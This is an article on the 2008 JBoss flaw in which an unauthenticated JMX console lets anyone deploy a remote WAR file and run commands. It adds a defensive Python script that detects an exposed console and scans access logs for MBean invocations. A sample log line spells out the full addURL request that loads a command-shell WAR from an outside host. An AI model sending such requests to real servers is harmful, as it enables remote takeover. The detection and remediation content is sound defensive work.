Hacking JBoss

Source: n.runs


JBoss is an open source, standards-compliant application server built on J2EE (Java 2 Platform, Enterprise Edition). Being written in Java, it is largely platform independent and hosts business components that are themselves written in Java; in essence, JBoss is an open source J2EE implementation that relies on the Enterprise JavaBeans specification for its functionality.

A flaw in the default configuration of JBoss gives an attacker effectively unlimited access to the host using nothing more than a web browser. In a default installation the Java Management Extensions (JMX) console is not protected by authentication, so anyone who can reach it acts with the privileges of the account the JBoss server runs as. The JMX console manages Managed Beans (MBeans), Java objects that represent server or application resources, and lets a visitor read their attributes and invoke their operations. Among them is the deployment scanner, whose addURL operation accepts a URL pointing at a Web Archive (WAR); the archive may sit on an attacker-controlled server and is fetched and deployed by JBoss, so arbitrary web applications can be made to run on the target. Security service provider n.runs has published a description of the problem that walks through finding a vulnerable server and deploying such a WAR so that it accepts operating-system commands and executes them with the rights of the JBoss process. The JBoss documentation explicitly states that the console must be secured; the standard settings after installation simply do not do it.
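The two checks a practitioner wants after reading the above are whether a server's JMX console answers without credentials, and whether anyone has already driven an MBean operation through it. The following is an added example, not code from the n.runs paper or from JBoss. It assumes the console is deployed at its default context /jmx-console/ with the HtmlAdaptor servlet beneath it, and that the web server writes Common Log Format access logs; the HTTP responses and log lines it works on are constructed for illustration, and the MBean name in the sample line is the one JBoss 4 registers for its URL deployment scanner.

```python
"""Triage helpers for an exposed JBoss JMX console (added example, not from the paper)."""
import re
from urllib.parse import parse_qs, urlsplit

JMX_CONSOLE_PATH = "/jmx-console/"            # default context of jmx-console.war
# HtmlAdaptor actions that invoke an MBean operation rather than just viewing it
INVOKE_ACTIONS = {"invokeOp", "invokeOpByName"}


def classify_jmx_console(status, headers, body):
    """Classify the response to an unauthenticated GET of /jmx-console/.

    Returns 'unprotected' when the MBean agent view is served without
    credentials, 'protected' when the server demands or refuses them,
    'absent' when the console is not deployed, else 'unknown'.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    if status == 401 and "www-authenticate" in lower:
        return "protected"
    if status == 403:
        return "protected"
    if status == 404:
        return "absent"
    # The default console page is titled "JBoss JMX Agent View" and links every
    # MBean through HtmlAdaptor; either string means the MBean list was served.
    if status == 200 and ("JMX Agent View" in body or "HtmlAdaptor?action=" in body):
        return "unprotected"
    return "unknown"


# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_jmx_op_invocations(log_lines):
    """Return one record per request that invokes an MBean operation via the console.

    Only GET requests expose their parameters in the access log; the same form
    can be submitted by POST, so an empty result is not proof that nothing happened.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith(JMX_CONSOLE_PATH):
            continue
        q = parse_qs(parts.query)
        action = q.get("action", [""])[0]
        if action not in INVOKE_ACTIONS:
            continue
        hits.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "status": int(m.group("status")),
            "action": action,
            "mbean": q.get("name", [""])[0],
            # invokeOpByName names the operation; invokeOp carries only a methodIndex
            "method_name": q.get("methodName", [""])[0],
            "args": [v[0] for k, v in sorted(q.items()) if re.fullmatch(r"arg\d+", k)],
        })
    return hits


# Constructed access-log excerpt: a look at the console, an addURL invocation on
# the URL deployment scanner pointing at a remote WAR, then unrelated traffic.
# Hosts and the WAR name are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Feb/2008:10:03:11 +0100] "GET /jmx-console/ HTTP/1.1" 200 6120',
    '10.0.0.5 - - [12/Feb/2008:10:03:40 +0100] "GET /jmx-console/HtmlAdaptor'
    '?action=invokeOpByName&name=jboss.deployment:type=DeploymentScanner,flavor=URL'
    '&methodName=addURL&argType=java.net.URL&arg0=http://203.0.113.7/cmd.war HTTP/1.1" 200 1403',
    '192.0.2.9 - - [12/Feb/2008:10:05:02 +0100] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(classify_jmx_console(200, {"Content-Type": "text/html"},
                               "<title>JBoss JMX Agent View</title>"))
    for hit in find_jmx_op_invocations(SAMPLE_LOG):
        print(hit)
```

A server that classifies as "unprotected" should get the fix the JBoss documentation describes: enable the commented-out security-constraint in jmx-console.war/WEB-INF/web.xml together with the security-domain entry in its jboss-web.xml, and restrict or remove the console altogether where it is not needed. Any addURL record whose argument points at a host you do not control is an indicator of exactly the compromise the paper demonstrates and warrants treating the server as breached.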
Format: PDF, Size: 512.20
Date: Feb 2008